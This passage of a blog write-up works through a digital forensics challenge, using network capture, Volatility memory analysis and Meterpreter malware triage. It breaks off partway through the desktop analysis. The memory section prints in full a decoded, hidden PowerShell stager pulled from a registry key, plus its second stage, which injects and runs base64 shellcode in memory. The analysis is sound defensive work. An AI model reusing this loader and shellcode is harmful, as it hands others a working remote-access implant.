The latest articles on DEV Community by chris (@evilcel3ri). https://dev.to/evilcel3ri https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F302321%2Fde81289b-9830-412c-acb3-2400479aedef.png https://dev.to/evilcel3ri en chris Thu, 20 May 2021 11:13:11 +0000 https://dev.to/evilcel3ri/the-case-of-the-missing-szechuan-sauce-investigation-notes-1di7 https://dev.to/evilcel3ri/the-case-of-the-missing-szechuan-sauce-investigation-notes-1di7 <p>In this article, we are going to solve the challenge of the <a href="https://dfirmadness.com/the-stolen-szechuan-sauce/">Case of the Missing Szechuan Sauce proposed by DFIRMadness</a> . This is a Digital Forensic and Incident Response (DFIR) challenge where we will have to investigate the memory and the traces left by an infection on a server and a endpoint computer.</p> <p>Beyond tools and technical issues, the biggest challenge is the <em>method</em>. Indeed, being able to navigate the large amount of data that we have was the biggest difficulty.</p> <p>So for that, we started from the network capture and pivoted from theories to theories until we could build a profile, timeframe and explanation of what happened. At some point, we kinda stop because we felt we could go deeper but it was unnecessary.</p> <h2> Network capture </h2> <p>To make sense of the network capture, we used a tool called <a href="https://www.brimsecurity.com">Brim</a>.</p> <p>Right away and from the overview quick search, we can identify a couple of endpoints and some malicious traffic.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--cdV0igpi--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kapahy5r7v18paajw1jn.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--cdV0igpi--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kapahy5r7v18paajw1jn.png" alt="Brim 1"></a></p> <p>Here are the first indicators from a preliminary analysis:</p> <ul> <li>timestamp 7h span between 2020/09/18 21:58:07 and 2020/09/19 05:38:57 UTC</li> <li>10.42.85[.]10 is Domain Controller (Citadel)</li> <li>10.42.85[.]115 is Desktop</li> <li>194.61.24[.]102 is Desktop</li> <li>203.78.103[.]109 is malicious (<a href="https://www.virustotal.com/gui/ip-address/203.78.103.109/relations">virustotal</a>)</li> </ul> <p>Pulling the time details of those indicators, we can get a better idea of the attack times.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--vEX8X1u_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9qc47gbtwee206ifleid.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--vEX8X1u_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9qc47gbtwee206ifleid.png" alt="Brim 2"></a><br> <a href="https://res.cloudinary.com/practicaldev/image/fetch/s--cUnksPWn--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tessxtxmwlln6qi76lxc.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--cUnksPWn--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tessxtxmwlln6qi76lxc.png" alt="Brim 3"></a></p> <p>Here are the first ideas:</p> <ul> <li>there were connections between the malicious IP and the internal IPs on 2021-09-19 around 2:25</li> <li>we don't have more information after 2:56</li> <li>both of the IPs have connections to the malicious IP</li> </ul> <p>If we look into the details of one of the "network trojan" alert, we can carve out a program called <code>coreupdater[.]exe</code> which seems far from legitimate.</p> <p>In the next screenshot, we can see that the malicious executable files is passed from what we have identified as the Desktop (10.42.85[.]10) and one IP we identified as the Desktop (194.61.24[.]102).</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--NGBas3c5--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/dvyak8v8wyacpyxqy7ay.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--NGBas3c5--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/dvyak8v8wyacpyxqy7ay.png" alt="Brim 4"></a></p> <p>Thus, we can suppose there was an implant on the 194 computer and then pivoted towards the DC. However, the timestamps for the moment don't make quite the whole story based on the analysis we go from Brim.</p> <p>Moreover, we know that <code>coreupdater[.]exe</code> is a Meterpreter binary thus we can look for more possible techniques linked with that tool. Plus, we observed Kerberos traffic with an Administrator request. This could mean that the attacker made a privilege escalation on the desktop.</p> <p>So, here are the things we need to prove in the next steps:</p> <ul> <li>How was the Desktop infected?</li> <li>How did the attacker elevate its privilege?</li> <li>When was the first sight of <code>coreupdater[.]exe</code> on the Desktop?</li> <li>What kind of malware is <code>coreupdater[.]exe</code>?</li> </ul> <h2> Malware Analysis </h2> <p>Here are the general overview of <code>coreupdater[.]exe</code> that we carved out of the network capture:</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--9yV_75SS--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/spxfs08o20gyt7rywemb.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--9yV_75SS--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/spxfs08o20gyt7rywemb.png" alt="Malware 1"></a></p> <p>Looking a bit about the functions, we can see a little amount of function, it probably mean the malware is packed.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--6StV0IvX--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/mx204x1bz5tr5f3oob2c.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--6StV0IvX--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/mx204x1bz5tr5f3oob2c.png" alt="Malware 2"></a></p> <p>So for the next part, we used a dynamic analysis service:</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--GDbYqMA6--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ldka7lruqaxp2zvpl9xj.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--GDbYqMA6--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ldka7lruqaxp2zvpl9xj.png" alt="Malware 3"></a><br> <a href="https://res.cloudinary.com/practicaldev/image/fetch/s---aPvU4cr--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/219300hcz67sg5x462qn.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s---aPvU4cr--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/219300hcz67sg5x462qn.png" alt="Malware 4"></a></p> <p>Here are some detection:</p> <ul> <li><a href="https://www.virustotal.com/gui/file/10f3b92002bb98467334161cf85d0b1730851f9256f83c27db125e9a0c1cfda6/detection">Virustotal</a></li> <li><a href="https://www.joesandbox.com/analysis/398583/0/html">Joe Sandbox</a></li> </ul> <p>We are not going to dwell too much on it as we already know this is Meterpreter. However, some of those information are going to be important when we'll look into the memory and the hard drive image.</p> <h2> Memory Analysis </h2> <p>In this section, the goal of the work is to extract artifacts and try to build up the trail that we are going to follow in the last part of the analysis: logs.</p> <h3> Domain Controller </h3> <p><code>vol3 -f citadeldc01.mem windows.pstree.PsTree</code></p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--vjM8vNuh--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/yon27eq1syjaxzchat70.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--vjM8vNuh--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/yon27eq1syjaxzchat70.png" alt="Memory 1"></a></p> <p><code>coreupdater[.]exe</code> is launched with the process 3644 and the parent process 2244. None of those number can be seen in the tree. The launch date is 2020-09-19 at 3:56:37 UTC which is the last moment detection we had in the network capture.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>vol3 -f citadeldc01.mem windows.netscan.NetScan | tee netscan.out cat netscan.out | grep "ESTABLISHED" cat netscan.out | grep "coreupdater" </code></pre> </div> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--R4w-8h-U--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/425s0maontjcw9rfvy9q.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--R4w-8h-U--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/425s0maontjcw9rfvy9q.png" alt="Memory 2"></a></p> <p>Now looking at the connection scan, we can see the <code>coreupdater[.]exe</code> file that was served with the malicious IP.</p> <p>In case we didn't had the malware we could extract it with the following commands:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>vol3 -f citadeldc01.mem windows.malfind.MalFind vol3 -f citadeldc01.mem windows.malfind.MalFind --dump </code></pre> </div> <p>Moreover, you can run <code>clamscan -o *</code> in the dump folder to see if there is a possible detection on your virus. Which for our case we have:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Win.Exploit.Meterpreter-9752338-0 FOUND </code></pre> </div> <p>If we look into registry keys, we find a suspicious key:</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--K8FLXVAn--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/b15hw8xs0khd525uttbc.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--K8FLXVAn--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/b15hw8xs0khd525uttbc.png" alt="Memory 5"></a></p> <p>We can dump the content of the key with:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>vol3 <span class="nt">-f</span> citadelledc01.mem windows.registry.printkey.PrintKey <span class="nt">--key</span> <span class="s2">"9sEoCawv"</span> | <span class="nb">tee </span>regkey.out </code></pre> </div> <p>The content of this key has its content encoded in base64:</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--uy7S0N8I--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/1g447jc8dy7amojeeqd8.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--uy7S0N8I--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/1g447jc8dy7amojeeqd8.png" alt="Memory 6"></a></p> <p>Here is the decoded value of this first content:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="kr">if</span><span class="p">([</span><span class="n">IntPtr</span><span class="p">]::</span><span class="n">Size</span><span class="w"> </span><span class="o">-eq</span><span class="w"> </span><span class="nx">4</span><span class="p">){</span><span class="nv">$b</span><span class="o">=</span><span class="nv">$</span><span class="nn">env</span><span class="p">:</span><span class="nv">windir</span><span class="o">+</span><span class="s1">'\sysnative\WindowsPowerShell\v1.0\powershell.exe'</span><span class="p">}</span><span class="kr">else</span><span class="p">{</span><span class="nv">$b</span><span class="o">=</span><span class="s1">'powershell.exe'</span><span class="p">};</span><span class="nv">$s</span><span class="o">=</span><span class="n">New-Object</span><span class="w"> </span><span class="nx">System.Diagnostics.ProcessStartInfo</span><span class="p">;</span><span class="nv">$s</span><span class="o">.</span><span class="nf">FileName</span><span class="o">=</span><span class="nv">$b</span><span class="p">;</span><span class="nv">$s</span><span class="o">.</span><span class="nf">Arguments</span><span class="o">=</span><span class="s1">'-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIACltZV8CA7VWa2+bSBT9nEj5D6iyBCiOjV2nzUaqtIAhxjWJKTZ27FoVhjFMPIADQ2zS7X/fOzakqZrstistQmIe93numbms8tijOIm53ccl4b6eHB8N3dSNOKEW33TrXC0ZjAPx6AjWa7u73ZT7wAlzebPpJpGL48XlpZqnKYrpYd64QlTOMhQtCUaZIHJ/cZMQpejsZnmHPMp95WpfGlckWbqkFCtU1wsRdybHPtsbJJ7LomnYG4KpwH/+zIvzs9aiod3nLskE3i4yiqKGTwgvct9E5nBUbJDAm9hLkyxZ0cYEx2/bjXGcuSt0DdYekIlomPgZL0IW8KaI5mnM7fNhBg7bAg/DYZp4su+nKMv4OjdnpueLxZ/CvPT7KY8pjlDDiClKk42N0gfsoazRc2OfoE9otQAtm6Y4DhaiCGIPyRoBlDkhde53zAjXaFuh9qtKwnMlkBrSVKxDIV/I00z8nKCDJv9CoKz4IjwVAQC5byfHJ8erii33xOmZz+kCo6P5fowgPGGYZHgv+IGT6pwJjlyapAVMa6M0R+LiCVyuthniUVF/3UCrkgbZtAULcyfB/gIUyoLWAm29s9jG68zsohWOUbeI3Qh7FfmEl2BGK4L2STYqsWuISeDLDeR3EUGBSxlwrNo/qWkRpk+6So6Jj1LZg1JlEBVUUfwxmEMtBN6ITRQBRoc50K+2AsqjSrqkeVF5Z3MQ4lXiZlmdG+Zw5rw6ZyOXIL/OyXGGyy05p8l+yH8P18wJxZ6b0crcQnwCsnSoJnFG09yDukHyI3uDPOwShkWd62EfKYWNg8ox/yISqksIHAWw9ACVgBWGgE0ZG1KI8VB5sWEjakQbgiIQ2h9/nbgBHPaS8Xv+uAHy+Z9irCh94C+Do8LhWYRQY5sktM45OKVwjTBo09Z/dP/s/jgEoqaorIZQnZK5UlBG7VqQYsbKEpg9DCkFCPQ0iRQ3Q+86h7tCeNPUcPd82E0eZXg0/ZPlKPbYmRmm3ye2Qe1bDQ/GYWjglhHAvBhrwZBKm4+jUa9vd3ty2t2FK9nIDK2nFFZLkb0efu/0lfEY9LA6sO52huwrUTANbtWtMQynBjhSB4ERwFcxQk+RZlKgSLo6sJVQw5Ic2FbP6rRmRvOCKPjRNmy5N3ny9+RH63R6091Ivjb7cqjf+Hqrre/110x/tr4adLX93GNz6zbTsAZ+NP3WckI0cTbKRNNnlrMxgtNtYDmDZkcPFVg38G6wsZvwtFr9h9h/NMnFownhWs6sj9HMCFARyJYs27cxsZdbVZav3hfSebwc62NYW4+MeGctN6Zf3PaafzgmRptEtjRZ1gmcykh2t91ma5IolnNujTVpV4yl3Va7a2413N+uy+/46t27oLnqDJuObcQ9N1Qg3qLfWeP+KexFriPdrpoOw6+rxc3HeErcodpKyLLZGuPue0UxMOpfmx65VyBnsHFuLRO17YUriMkILqxgmsRtdw12J4EM0UF+UOdV3wAdJSd4PT6dMlv9rRT1dxKLM+pfQGztMgaZxsa0CfHJva6txle2MW37SFeap96HN4yzQNpa0HvGxNdaiemmWegSYCj0iOpm0JNUL6/9YYKZhiDsfxbWKI0RgV4L3bg6WzIhice6zqFBQMs7NCLWF8cwfNt+cSRyT4Li93ZULV1eziBMOLBwnhoDFAc0rEu7t5IErUXadSTI8dczU5NNITBLddaZAJfSLtnbFdn5raEv9/T/hau8NUL4+P8K1/e1f9j9JQilOkv4p8UfF34Lzt/OfOJiCpI2XHsEHVrvKwCU1Hj2e8LqApVflQ/7v7zJ6dk1/LWcHP8N+iP4ZsoKAAA=''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))'</span><span class="p">;</span><span class="nv">$s</span><span class="o">.</span><span class="nf">UseShellExecute</span><span class="o">=</span><span class="bp">$false</span><span class="p">;</span><span class="nv">$s</span><span class="o">.</span><span class="nf">RedirectStandardOutput</span><span class="o">=</span><span class="bp">$true</span><span class="p">;</span><span class="nv">$s</span><span class="o">.</span><span class="nf">WindowStyle</span><span class="o">=</span><span class="s1">'Hidden'</span><span class="p">;</span><span class="nv">$s</span><span class="o">.</span><span class="nf">CreateNoWindow</span><span class="o">=</span><span class="bp">$true</span><span class="p">;</span><span class="nv">$p</span><span class="o">=</span><span class="p">[</span><span class="n">System.Diagnostics.Process</span><span class="p">]::</span><span class="n">Start</span><span class="p">(</span><span class="nv">$s</span><span class="p">);</span><span class="w"> </span></code></pre> </div> <p>More base64! This code will get a new encoded process that we can decode again to:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="kr">function</span><span class="w"> </span><span class="nf">xKbl</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="kr">Param</span><span class="w"> </span><span class="p">(</span><span class="nv">$nOD</span><span class="p">,</span><span class="w"> </span><span class="nv">$oLUg</span><span class="p">)</span><span class="w"> </span><span class="nv">$xjxX</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">([</span><span class="n">AppDomain</span><span class="p">]::</span><span class="n">CurrentDomain.GetAssemblies</span><span class="p">()</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Where-Object</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="bp">$_</span><span class="o">.</span><span class="nf">GlobalAssemblyCache</span><span class="w"> </span><span class="o">-And</span><span class="w"> </span><span class="bp">$_</span><span class="o">.</span><span class="nf">Location</span><span class="o">.</span><span class="nf">Split</span><span class="p">(</span><span class="s1">'\\'</span><span class="p">)[</span><span class="nt">-1</span><span class="p">]</span><span class="o">.</span><span class="nf">Equals</span><span class="p">(</span><span class="s1">'System.dll'</span><span class="p">)</span><span class="w"> </span><span class="p">})</span><span class="o">.</span><span class="nf">GetType</span><span class="p">(</span><span class="s1">'Microsoft.Win32.UnsafeNativeMethods'</span><span class="p">)</span><span class="w"> </span><span class="kr">return</span><span class="w"> </span><span class="nv">$xjxX</span><span class="o">.</span><span class="nf">GetMethod</span><span class="p">(</span><span class="s1">'GetProcAddress'</span><span class="p">,</span><span class="w"> </span><span class="p">[</span><span class="n">Type</span><span class="p">[]]@([</span><span class="n">System.Runtime.InteropServices.HandleRef</span><span class="p">],</span><span class="w"> </span><span class="p">[</span><span class="n">String</span><span class="p">]))</span><span class="o">.</span><span class="nf">Invoke</span><span class="p">(</span><span class="bp">$null</span><span class="p">,</span><span class="w"> </span><span class="p">@([</span><span class="n">System.Runtime.InteropServices.HandleRef</span><span class="p">]</span><span class="err">(New-Object</span><span class="w"> </span><span class="err">System.Runtime.InteropServices.HandleRef((New-Object</span><span class="w"> </span><span class="err">IntPtr</span><span class="p">),</span><span class="w"> </span><span class="p">(</span><span class="nv">$xjxX</span><span class="o">.</span><span class="nf">GetMethod</span><span class="p">(</span><span class="s1">'GetModuleHandle'</span><span class="p">))</span><span class="o">.</span><span class="nf">Invoke</span><span class="p">(</span><span class="bp">$null</span><span class="p">,</span><span class="w"> </span><span class="p">@(</span><span class="nv">$nOD</span><span class="p">)))),</span><span class="w"> </span><span class="nv">$oLUg</span><span class="p">))</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="kr">function</span><span class="w"> </span><span class="nf">qlVHM</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="kr">Param</span><span class="w"> </span><span class="p">(</span><span class="w"> </span><span class="p">[</span><span class="n">Parameter</span><span class="p">(</span><span class="n">Position</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="n">Mandatory</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nv">$True</span><span class="p">)]</span><span class="w"> </span><span class="p">[</span><span class="n">Type</span><span class="p">[]]</span><span class="w"> </span><span class="nv">$pPiTy</span><span class="p">,</span><span class="w"> </span><span class="p">[</span><span class="n">Parameter</span><span class="p">(</span><span class="n">Position</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">1</span><span class="p">)]</span><span class="w"> </span><span class="p">[</span><span class="n">Type</span><span class="p">]</span><span class="w"> </span><span class="nv">$r1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="n">Void</span><span class="p">]</span><span class="w"> </span><span class="p">)</span><span class="w"> </span><span class="nv">$gEkxQ</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="n">AppDomain</span><span class="p">]::</span><span class="n">CurrentDomain.DefineDynamicAssembly</span><span class="p">((</span><span class="n">New-Object</span><span class="w"> </span><span class="nx">System.Reflection.AssemblyName</span><span class="p">(</span><span class="s1">'ReflectedDelegate'</span><span class="p">)),</span><span class="w"> </span><span class="p">[</span><span class="n">System.Reflection.Emit.AssemblyBuilderAccess</span><span class="p">]::</span><span class="n">Run</span><span class="p">)</span><span class="o">.</span><span class="nf">DefineDynamicModule</span><span class="p">(</span><span class="s1">'InMemoryModule'</span><span class="p">,</span><span class="w"> </span><span class="bp">$false</span><span class="p">)</span><span class="o">.</span><span class="nf">DefineType</span><span class="p">(</span><span class="s1">'MyDelegateType'</span><span class="p">,</span><span class="w"> </span><span class="s1">'Class, Public, Sealed, AnsiClass, AutoClass'</span><span class="p">,</span><span class="w"> </span><span class="p">[</span><span class="n">System.MulticastDelegate</span><span class="p">])</span><span class="w"> </span><span class="nv">$gEkxQ</span><span class="o">.</span><span class="nf">DefineConstructor</span><span class="p">(</span><span class="s1">'RTSpecialName, HideBySig, Public'</span><span class="p">,</span><span class="w"> </span><span class="p">[</span><span class="n">System.Reflection.CallingConventions</span><span class="p">]::</span><span class="nx">Standard</span><span class="p">,</span><span class="w"> </span><span class="nv">$pPiTy</span><span class="p">)</span><span class="o">.</span><span class="nf">SetImplementationFlags</span><span class="p">(</span><span class="s1">'Runtime, Managed'</span><span class="p">)</span><span class="w"> </span><span class="nv">$gEkxQ</span><span class="o">.</span><span class="nf">DefineMethod</span><span class="p">(</span><span class="s1">'Invoke'</span><span class="p">,</span><span class="w"> </span><span class="s1">'Public, HideBySig, NewSlot, Virtual'</span><span class="p">,</span><span class="w"> </span><span class="nv">$r1</span><span class="p">,</span><span class="w"> </span><span class="nv">$pPiTy</span><span class="p">)</span><span class="o">.</span><span class="nf">SetImplementationFlags</span><span class="p">(</span><span class="s1">'Runtime, Managed'</span><span class="p">)</span><span class="w"> </span><span class="kr">return</span><span class="w"> </span><span class="nv">$gEkxQ</span><span class="o">.</span><span class="nf">CreateType</span><span class="p">()</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">[</span><span class="n">Byte</span><span class="p">[]]</span><span class="nv">$gri</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="n">System.Convert</span><span class="p">]::</span><span class="n">FromBase64String</span><span class="p">(</span><span class="s2">"/EiD5PDozAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpS////11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSbwCAAG7y05nbUFUSYnkTInxQbpMdyYH/9VMiepoAQEAAFlBuimAawD/1WoBQV5QUE0xyU0xwEj/wEiJwkj/wEiJwUG66g/f4P/VSInHahBBWEyJ4kiJ+UG6maV0Yf/VhcB0DEn/znXlaPC1olb/1UiD7BBIieJNMclqBEFYSIn5QboC2chf/9VIg8QgXon2akBBWWgAEAAAQVhIifJIMclBulikU+X/1UiJw0mJx00xyUmJ8EiJ2kiJ+UG6AtnIX//VSAHDSCnGSIX2deFB/+c="</span><span class="p">)</span><span class="w"> </span><span class="nv">$gH</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="n">System.Runtime.InteropServices.Marshal</span><span class="p">]::</span><span class="n">GetDelegateForFunctionPointer</span><span class="p">((</span><span class="n">xKbl</span><span class="w"> </span><span class="nx">kernel32.dll</span><span class="w"> </span><span class="nx">VirtualAlloc</span><span class="p">),</span><span class="w"> </span><span class="p">(</span><span class="n">qlVHM</span><span class="w"> </span><span class="p">@([</span><span class="n">IntPtr</span><span class="p">],</span><span class="w"> </span><span class="p">[</span><span class="n">UInt32</span><span class="p">],</span><span class="w"> </span><span class="p">[</span><span class="n">UInt32</span><span class="p">],</span><span class="w"> </span><span class="p">[</span><span class="n">UInt32</span><span class="p">])</span><span class="w"> </span><span class="p">([</span><span class="n">IntPtr</span><span class="p">])))</span><span class="o">.</span><span class="nf">Invoke</span><span class="p">([</span><span class="n">IntPtr</span><span class="p">]::</span><span class="nx">Zero</span><span class="p">,</span><span class="w"> </span><span class="nv">$gri</span><span class="o">.</span><span class="nf">Length</span><span class="p">,</span><span class="nx">0x3000</span><span class="p">,</span><span class="w"> </span><span class="nx">0x40</span><span class="p">)</span><span class="w"> </span><span class="p">[</span><span class="n">System.Runtime.InteropServices.Marshal</span><span class="p">]::</span><span class="n">Copy</span><span class="p">(</span><span class="nv">$gri</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="nv">$gH</span><span class="p">,</span><span class="w"> </span><span class="nv">$gri</span><span class="o">.</span><span class="nf">length</span><span class="p">)</span><span class="w"> </span><span class="nv">$e_qt</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="n">System.Runtime.InteropServices.Marshal</span><span class="p">]::</span><span class="n">GetDelegateForFunctionPointer</span><span class="p">((</span><span class="n">xKbl</span><span class="w"> </span><span class="nx">kernel32.dll</span><span class="w"> </span><span class="nx">CreateThread</span><span class="p">),</span><span class="w"> </span><span class="p">(</span><span class="n">qlVHM</span><span class="w"> </span><span class="p">@([</span><span class="n">IntPtr</span><span class="p">],</span><span class="w"> </span><span class="p">[</span><span class="n">UInt32</span><span class="p">],</span><span class="w"> </span><span class="p">[</span><span class="n">IntPtr</span><span class="p">],</span><span class="w"> </span><span class="p">[</span><span class="n">IntPtr</span><span class="p">],</span><span class="w"> </span><span class="p">[</span><span class="n">UInt32</span><span class="p">],</span><span class="w"> </span><span class="p">[</span><span class="n">IntPtr</span><span class="p">])</span><span class="w"> </span><span class="p">([</span><span class="n">IntPtr</span><span class="p">])))</span><span class="o">.</span><span class="nf">Invoke</span><span class="p">([</span><span class="n">IntPtr</span><span class="p">]::</span><span class="nx">Zero</span><span class="p">,</span><span class="nx">0</span><span class="p">,</span><span class="nv">$gH</span><span class="p">,[</span><span class="n">IntPtr</span><span class="p">]::</span><span class="nx">Zero</span><span class="p">,</span><span class="nx">0</span><span class="p">,[</span><span class="n">IntPtr</span><span class="p">]::</span><span class="nx">Zero</span><span class="p">)</span><span class="w"> </span><span class="p">[</span><span class="n">System.Runtime.InteropServices.Marshal</span><span class="p">]::</span><span class="n">GetDelegateForFunctionPointer</span><span class="p">((</span><span class="n">xKbl</span><span class="w"> </span><span class="nx">kernel32.dll</span><span class="w"> </span><span class="nx">WaitForSingleObject</span><span class="p">),</span><span class="w"> </span><span class="p">(</span><span class="n">qlVHM</span><span class="w"> </span><span class="p">@([</span><span class="n">IntPtr</span><span class="p">],</span><span class="w"> </span><span class="p">[</span><span class="n">Int32</span><span class="p">])))</span><span class="o">.</span><span class="nf">Invoke</span><span class="p">(</span><span class="nv">$e_qt</span><span class="p">,</span><span class="nx">0xffffffff</span><span class="p">)</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Out-Null</span><span class="w"> </span></code></pre> </div> <p>This is a a part where our knowledge of Windows internals are getting their limits. From what we could understand here is that this code is going to inject something in memory. The exact method of this exploit is not known to us, we'll have to deal with this.</p> <p>It's possible that this was a process injection generated by Meterpreter. However, how was that triggered? </p> <h2> Desktop </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>vol3 <span class="nt">-f</span> DESKTOP-SDN1RTP.mem windows.pstree.PsTree </code></pre> </div> <p>This command doesn't work for some page fault error.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>vol3 <span class="nt">-f</span> DESKTOP-SDN1RTP.mem windows.netstat.NetStat </code></pre> </div> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--gK0GwYAo--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/dw653l81zh1tsbywa610.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--gK0GwYAo--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/dw653l81zh1tsbywa610.png" alt="Memory 